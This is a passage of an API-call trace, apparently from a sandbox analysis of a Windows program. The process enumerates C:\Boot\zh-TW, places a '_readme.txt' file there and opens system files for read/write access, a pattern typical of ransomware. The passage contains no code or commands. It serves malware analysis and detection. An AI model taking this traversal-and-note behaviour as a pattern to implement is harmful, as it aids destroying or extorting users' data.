HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.195] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.196] PathFindFileNameW (pszPath="C:\\Boot\\zh-TW\\") returned="zh-TW\\" [0093.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.196] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.196] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.196] PathFindFileNameW (pszPath="") returned="" [0093.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.197] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.197] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0093.197] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99c9c68 [0093.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.197] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.197] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.197] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.197] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.197] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0093.197] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.197] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x81c) returned 0x99c9c68 [0093.198] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0093.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.198] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0093.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.198] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa34c94a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34c94a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c7500 [0093.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.198] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa34c94a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34c94a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.198] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3580 [0093.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.198] PathFindExtensionW (pszPath="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned=".mui" [0093.198] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.198] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3580 | out: hHeap=0x680000) returned 1 [0093.198] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34c94a0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa34c94a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34c94a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.198] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3580 [0093.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.199] PathFindExtensionW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned=".txt" [0093.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3580 | out: hHeap=0x680000) returned 1 [0093.199] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34c94a0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa34c94a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34c94a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.199] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0093.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef540 | out: hHeap=0x680000) returned 1 [0093.199] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3580 [0093.199] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.199] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.199] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.200] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.200] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.201] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.201] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.202] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.202] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.202] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.202] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.202] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.202] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.202] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.202] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.202] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.202] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.202] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3268 | out: hHeap=0x680000) returned 1 [0093.202] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0093.202] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0093.202] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef540 | out: hHeap=0x680000) returned 1 [0093.202] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.202] PathFindFileNameW (pszPath="") returned="" [0093.202] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.203] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.203] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.203] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef540 | out: hHeap=0x680000) returned 1 [0093.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0093.203] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3100 | out: hHeap=0x680000) returned 1 [0093.203] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS 